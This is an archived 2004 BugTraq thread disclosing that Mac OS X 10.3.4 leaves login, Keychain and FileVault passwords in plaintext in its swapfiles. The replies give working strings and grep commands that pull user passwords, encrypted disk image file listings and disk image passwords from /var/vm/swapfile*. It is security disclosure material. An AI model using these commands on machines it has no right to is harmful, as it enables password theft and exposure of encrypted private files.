BugTraq
Re: Mac OS X stores login/Keychain/FileVault passwords on disk Jul 16 2004 02:51PM
johnny ihackstuff com


The issue of getting into AES128 encrypted disk images is easy to

unravel with this swapfile problem.

We'll start by grabbing the volume name of an AES128 encrypted disk

image file. Assuming the image name is test1.dmg, try:

root# strings -8 /var/vm/swapfile* | grep -B1 test1.dmg | grep

Volumes

/Volumes/SECRET

Armed with the volume name, we can grab the file listing of that

(supposedly protected) AES128 encrypted disk image.  Since our

volume name is 'SECRET'. Try:

root# strings -8 /var/vm/swapfile* | grep "<string>/Volumes/SECRET"

<string>/Volumes/SECRET/secretporn.pdf</string>

<string>/Volumes/SECRET/secretphoto.jpg</string>

<string>/Volumes/SECRET/badmovie.mpg</string>

<string>/Volumes/SECRET/horriblybadmovie.mpg</string>

<string>/Volumes/SECRET/naughty.mpg</string>

<string>/Volumes/SECRET</string>

To REALLY get at those (supposedly protected) files, we could use the

password. It's easy to grab it even if it's not in the keychain:

root# strings -8 /var/vm/swapfile* | grep -B1 "/System/Library/

CoreServices/DiskImageMounter.app"

[... snip ... ]

--

mySecretPasswordTest

/System/Library/CoreServices/DiskImageMounter.app

[... snip ... ]

The only chore may be figuring out which password goes with which

disk image. And that's not nearly the chore of popping AES128

encryption...

j0hnny

http://johnny.ihackstuff.com

johnny (at) ihackstuff (dot) com [email concealed]

-------------------------------------

From: Adi Kriegisch <adi (at) cg.tuwien.ac (dot) at [email concealed]>

To: bugtraq (at) securityfocus (dot) com [email concealed]

Subject: Re: Mac OS X stores login/Keychain/FileVault passwords on

disk

Sent: Monday, July 12, 2004 9:05 AM

The swapfiles are deleted on startup -- this means even a clean

shutdown by

user leaves the passwords on disk.

So if you loose your powerbook someone might boot it in "target disk

mode" and

will be able to get your password!

Adi

===

 

 

It seems that Mac OS X (10.3.4 tested) doesn't bother clearing memory

containing sensitive data, or using mlock() to avoid swapping.

A quick grep of the swapfiles will show up various morsels:

rez:~> sudo strings -8 /var/vm/swapfile0 |grep -A 4 -i longname

longname

password

<user's password here>

/bin/zsh

username

---

... various other occurrences follow

Grepping for context around "password" also shows up results, and

grepping

for portions of a Keychain password (differing from the login password)

will also get results. It appears that loginwindow is one of the apps

involved, I haven't investigated what else is involved. The amount of

memory and usage patterns of the machine will affect what gets

swapped,

though loginwindow seems likely to get swapped early since it is

seldom

used after login.

Obviously this is only of interest if an attacker has root (or physical)

access to a machine, however it does make FileVault or Keychain

encryption

fairly useless. It appears that the swapfiles are removed on shutdown

or

startup, though not wiped - pulling the power from a sleeping

machine,

and/or booting from CD, would quite easily retrieve the password(s).

Reported to Apple on 21 June, I haven't had any response. It'd be nice

if

they at least said "we're taking a look if it's an issue".

Matt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus